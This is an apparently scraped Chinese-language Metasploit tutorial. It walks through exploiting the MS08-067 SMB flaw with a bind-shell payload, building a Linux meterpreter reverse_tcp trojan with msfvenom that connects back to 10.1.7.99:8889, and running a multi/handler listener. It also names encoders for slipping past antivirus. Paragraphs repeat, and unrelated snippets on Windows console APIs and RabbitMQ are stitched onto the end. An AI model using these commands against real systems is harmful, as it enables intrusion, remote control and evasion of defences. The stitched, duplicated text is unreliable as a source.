測試者利用它來攻擊乙個系統,程式,或服務,以獲得開發者意料之外的結果。常見的有記憶體溢位,**程式漏洞利用,配置錯誤exploit。
exploits總的來說共分為兩類溢位(exploit)攻擊方法,即主動溢位和被動溢位。主動溢位是針對目標主機的漏洞主動的進行攻擊以獲得控制許可權,被動溢位是針
對目標主機被動的監聽然後獲得相應的操作。
exploit共分為13種,分別是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
這個是使用引數。如你要使用到某個利用模組,payload等,那麼就要使用到use引數
使用漏洞 use 你選擇的利用模組
這個命令用的很多。請一定認真看。如果單純的輸入show,那麼就會顯示出所有的payload,利用模組,post模組,外掛程式等等。但是一般我們都不這麼使用。如果要顯示利用模組,那麼就輸入show exploits。如果要顯示payload,那麼就輸入show payloads。
展示可用載荷show payloads
檢視還需要設定的選項 show options,為yes且空的就是還需要我們設定的。 可以看到下圖中rhost引數還未設定內容
這個主要是對payload或者其他模組進行設定。比如設定攻擊目標的ip就是set rhost 10.1.7.90
測試者利用它來攻擊乙個系統,程式,或服務,以獲得開發者意料之外的結果。常見的有記憶體溢位,**程式漏洞利用,配置錯誤exploit。
exploits總的來說共分為兩類溢位(exploit)攻擊方法,即主動溢位和被動溢位。主動溢位是針對目標主機的漏洞主動的進行攻擊以獲得控制許可權,被動溢位是針
對目標主機被動的監聽然後獲得相應的操作。
exploit共分為13種,分別是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
在metasploit中內建了27種encode模組,可對metasploit中的exploit進行編碼(encode),以避免反病毒軟體檢測。如:
generic/none normal the 「none」 encoder
mipsbe/longxor normal xor encoder
mipsle/longxor normal xor encoder
php/base64 great php base64 encoder
ppc/longxor normal ppc longxor encoder
我們想讓被攻擊系統執行的程式,如reverse shell 可以從目標機器與測試者之間建立一
個反響連線,bind shell 繫結乙個執行命令的通道至測試者的機器。payload 也可以是只
能在目標機器上執行有限命令的程式。
常用exploit,payload設定引數
show exploit——顯示metasploit中所有滲透攻擊模組
show playload——檢視所有活動狀態的攻擊載荷
1.//查詢ms08_067漏洞
msf > search ms08_067
2、//使用ms08_067漏洞
use exploit/windows/smb/ms08_067_netapi
3、//設定遠端位址,正向連線
set rhost 192.168.120.131
4、//設定shellcode
set payload windows/shell_bind_tcp
5、//顯示配置的選項
show options
6、//expliot攻擊–>成功返回shell1、通過msfvenom生成木馬
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.1.7.99 lport=8889 -f elf >/root/sa.elf
2、用kali開啟監聽,並在菜刀的虛擬終端上執行木馬
use exploit/multi/handler 使用handler模組
set payload linux/x64/meterpreter/reverse_tcp payload 配置payload
set lhost 10.1.7.90
set lport 8889
run
認識控制台 控制台控制代碼 附著到控制台 關閉控制台
1.附著到乙個控制台 乙個程序可以使用 attachconsole 函式來附著到乙個控制台上,乙個程序只能附著乙個控制台。乙個控制台可以有許多程序附著到它上面,呼叫 getconsoleprocesslist 函式可以得到附著到乙個控制台的列表。2.關閉乙個控制台 程序可以使用 freeconsol...
認識控制台 控制台控制代碼 附著到控制台 關閉控制台
附著到乙個控制台 乙個程序可以使用 attachconsole 函式來附著到乙個控制台上,乙個程序只能附著乙個控制台。乙個控制台可以有許多程序附著到它上面,呼叫 getconsoleprocesslist 函式可以得到附著到乙個控制台的列表。關閉乙個控制台 程序可以使用 freeconsole 函式...
rabbitmq 管理控制台簡介(一)
rabbitmq management是rabbitmq web管理端,用的是erlang的cowboy框架進行開發。web頁面包括overview 概述 connections 連線 channels 通道 exchanges 交換器 queues 佇列 admin 使用者管理 啟動乙個borke...